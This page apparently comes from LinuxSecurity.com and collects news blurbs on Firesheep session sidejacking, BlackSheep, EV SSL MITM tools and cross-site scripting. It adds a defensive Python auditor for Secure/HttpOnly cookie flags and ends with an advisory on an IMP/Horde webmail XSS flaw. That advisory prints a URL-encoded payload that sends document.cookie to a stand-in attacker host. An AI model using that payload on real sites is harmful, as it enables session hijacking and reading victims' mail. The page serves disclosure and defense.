With more than 600,000 copies of the FireSheep browser plug-in downloaded in a matter of weeks, Web security firm zScaler has released a new Firefox plug-in, BlackSheep, in hopes of combating attempts by those using FireSheep to hijack their Web sessions. The plug-in doesn

The link for this article located at ThreatPost is no longer available.

LinuxSecurity.com Team
An open-source Firefox extension called Firesheep has shined a spotlight on just how insecure it is to use unprotected WiFi networks. It's widely known that unprotected WiFi networks make sensitive data readily available for anyone with the technical skill necessary to find it, as demonstrated by Google's four-year Street View WiFi data gathering odyssey.

Google got into trouble for being unaware that software in its Street View cars was vacuuming up data, but those broadcasting sensitive information over their networks and those running Web services with inadequate security somehow escaped blame. That may change, thanks to Firesheep, which allows anyone to scan unprotected WiFi networks for users who are logged into Facebook, Twitter, Google, Amazon, and a variety of other Web 2.0 services and to impersonate those users by hijacking their session cookie.

The link for this article located at Information Week is no longer available.

LinuxSecurity.com Team
Over the last few days, the internet was lit up by reports of a security hole in the Firefox web browser that allowed anyone to hack into Facebook, Twitter, Yelp or Tumblr. A freelance programmer named Eric Butler wrote an extension to Firefox (which anyone can install) that exploits this hole by grabbing free-floating cookies in Wi-Fi networks attached to the above-named sites.

The extension, called Firesheep, takes advantage of a widely known flaw in Wi-Fi setups. When a user logs into his or her Facebook account, the social network's servers authenticate the user via log-in and password information. Once that person is authenticated, Facebook sends a cookie to that user's browser to enable access. After the cookie is sent, however, the connection no longer runs over a secure layer (the HTTPS protocol), which would provide what is essentially a persistent form of authentication. Online banking operations, for example, only allow for persistent authentication. Facebook and Twitter, however, do not. In most situations, the lack of a continuous secure connection is not a problem, as the authentication cookie sits in the user's browser and is not easy to steal. But on public Wi-Fi networks, these cookies are literally floating through the air, a flaw that Firesheep exploits by grabbing them and allowing anyone who has installed the Firesheep extension to access a Facebook session started by someone on the same wireless network.

The link for this article located at Advertising Age is no longer available.

LinuxSecurity.com Team
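As an added, defender-side example (not code from any of the articles above or from Firesheep itself), the Python below audits Set-Cookie headers for the Secure and HttpOnly attributes whose absence is what lets a sniffer on open Wi-Fi, or an injected script, read a session cookie. The header strings and the session-name hints are constructed assumptions for the illustration.

```python
"""Audit Set-Cookie headers for the attributes that blunt session sidejacking.

Constructed example: the headers below are made up and do not come from
Facebook, Twitter or any other site named in the articles.
"""
from http.cookies import SimpleCookie

# Assumed substrings that mark a cookie as a session identifier (constructed).
SESSION_NAME_HINTS = ("sess", "sid", "auth", "login")

# Constructed sample responses: one sniffable session cookie, one non-session
# cookie, and one correctly hardened session cookie.
SAMPLE_HEADERS = [
    "sessionid=4f9c1a; Path=/; HttpOnly",
    "csrftoken=77ab; Path=/",
    "sessionid_v2=b01d; Path=/; Secure; HttpOnly",
]


def audit_set_cookie(header_value: str) -> dict:
    """Return {cookie_name: [findings]} for one Set-Cookie header value.

    Without Secure the browser also sends the cookie on plain http:// requests,
    which is exactly what a passive sniffer on open Wi-Fi captures; without
    HttpOnly an injected script can read it via document.cookie.
    """
    jar = SimpleCookie()
    jar.load(header_value)
    report = {}
    for name, morsel in jar.items():
        findings = []
        if not morsel["secure"]:
            findings.append("missing Secure (sent over cleartext HTTP)")
        if not morsel["httponly"]:
            findings.append("missing HttpOnly (readable by injected script)")
        if findings and any(h in name.lower() for h in SESSION_NAME_HINTS):
            findings.insert(0, "looks like a session cookie")
        report[name] = findings
    return report


def exposed_on_open_wifi(headers) -> list:
    """Names of cookies, across several headers, that would travel in cleartext."""
    return sorted(name
                  for header in headers
                  for name, findings in audit_set_cookie(header).items()
                  if any(f.startswith("missing Secure") for f in findings))


if __name__ == "__main__":
    for header in SAMPLE_HEADERS:
        print(audit_set_cookie(header))
    print("exposed:", exposed_on_open_wifi(SAMPLE_HEADERS))
```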
Want to hack someone else's Amazon, Facebook, Twitter or Windows Live account in just one click? A Firefox extension called Firesheep claims you can, by hijacking a person's current user session over an open Wi-Fi connection. I tested the extension out and to my horror it works as advertised - almost, that is. Firesheep was created by Seattle-based software developer Eric Butler, who said he created the extension to highlight the security risks associated with session hijacking, also known as sidejacking. Firesheep targets 26 online services, including many popular ones such as Amazon, Facebook, Foursquare, Google, The New York Times, Twitter, Windows Live, Wordpress and Yahoo. The extension is also customizable, allowing a hacker to target other Websites not listed by Firesheep.

The link for this article located at Network World is no longer available.

LinuxSecurity.com Team
If you think you're safe from man-in-the-middle (MITM) attacks as long as you're visiting an Extended Validation SSL (EV SSL) site, then think again: Researchers will release a new tool at Black Hat USA later this month that lets an attacker hack into a user's session on an EV SSL-secured site.

Mike Zusman and Alex Sotirov -- who in March first demonstrated possible MITM attacks on EV SSL at CanSecWest -- will release their proxy tool for the first time at the Las Vegas conference, as well as demonstrate variations on the attacks they have discovered. The Python-based tool can launch an attack even with the secure green badge displaying on the screen: "It doesn't alert the user that anything fishy is going on," says Zusman, principal consultant at Intrepidus.

The link for this article located at Dark Reading is no longer available.

LinuxSecurity.com Team
For the first learning session on Help Net Security, we've got Caleb Sima, SPI Dynamics CTO and co-founder, discussing session hijacking attacks. While session hijacking can be applied to a lot of areas, this learning session concentrates on attacks on web applications. In this eleven-minute audio, Mr. Sima traverses all the important characteristics of session hijacking and presents a number of practical examples of these attacks on online e-commerce sites.

The link for this article located at net-security.org is no longer available.

Anthony Pell
Blair pointed us to an article on XSS. "Cross-site scripting is a potentially dangerous security exposure that should be considered when designing a secure Web-based application. Users can unknowingly execute malicious scripts when viewing dynamically generated pages based on content provided by an attacker. An attacker can take over the user session before the user's session cookie expires. An attacker can connect users to a malicious server of the attacker's choice. This article describes the nature of the exposure, how it works, and has an overview of some recommended remediation strategies."

Most Web sites today add dynamic content to a Web page, making the experience for the user more enjoyable. Dynamic content is content generated by some server process, which when delivered can behave and display differently to the user depending upon their settings and needs. Dynamic Web sites have a threat that static Web sites don't, called "cross-site scripting," also known as "XSS."

"A Web page contains both text and HTML markup that is generated by the server and interpreted by the client browser. Web sites that generate only static pages are able to have full control over how the browser user interprets these pages. Web sites that generate dynamic pages do not have complete control over how their outputs are interpreted by the client. The heart of the issue is that if untrusted content can be introduced into a dynamic page, neither the Web sites nor the client has enough information to recognize that this has happened and take protective actions," according to CERT Coordination Center, a federally funded research and development center that studies Internet security vulnerabilities and provides incident response.

The link for this article located at IBM developerWorks is no longer available.

LinuxSecurity.com Team
Joao Pedro reports that "It's possible to hijack an imp/horde session using a cross-site script attack, quite similar to the one explored by Marc Slemko in his "Microsoft Passport to Trouble" paper."

- After hijacking the cookies, the attacker can use the session and read the victim's mail.
- Imp webmail is part of the Horde Application Framework, at https://www.horde.org/ , which allows web access to an email account through POP3 or IMAP.
- Imp is included in the Linux Mandrake and Conectiva distributions. It's also available in the Red Hat PowerTools.
- It's used in several webmail sites, some of which have hundreds of thousands of users, and all of the ones tested were vulnerable. Some of the administrators were warned before this advisory was made public. Some have already been patched.
- All stable imp webmail versions, up to and including 2.2.6, are vulnerable; the devel version, 2.3 and 3.0 Release Candidate 1 are not affected by this vulnerability.
- The horde team was warned about this and has committed a fix; a new version should be uploaded soon.
- To apply the patch use https://dev.horde.org/horde/login.php or just escape the $message variable ($message = htmlspecialchars($message);) if your imp installation is already heavily customized.
- To exploit this vulnerability using a text message, the attacker sends an email with a URL where, if the user clicks, they are redirected to %3E%20document.write(%27%3Cimg%20src%3Dhttp%3A%2F%2Fattackerhost.com%2Fcookie.cgi%3Fcookie%3D%27%20%2B%20escape(document.cookie)%2B%20%27%3E%27)%3B%3C%2Fscript%3E%0A which in return redirects the user's browser to the attacker's server, where he hijacks the cookies that the browser used in the context of the webmail site, and therefore the session.

This attack is just one more example of how trusting user input is a Bad Thing(tm), as well as of the risks inherent in cross-site script attacks. Please, pretty please: this was discovered while playing around with cookie-based session sites, after reading about the MS Wallet attack and seeing how, almost 2 years after the CERT advisory on these techniques, lots of applications are still vulnerable. There are probably lots of kids around exploiting similar vulnerabilities. So check your web applications for similar vulnerabilities and ask yourself how many times you have pasted directly into the HTML some variable passed by the URL or cookie.

- For more info on cross-site scripting, read the CERT advisory and Marc Slemko's paper.

Imp Project homepage: https://www.horde.org/apps/imp/
Marc Slemko's "Microsoft Passport to Trouble":
CERT advisory on cross-site scripting: https://www.sei.cmu.edu/library/2000-cert-advisories/

João Pedro Gonçalves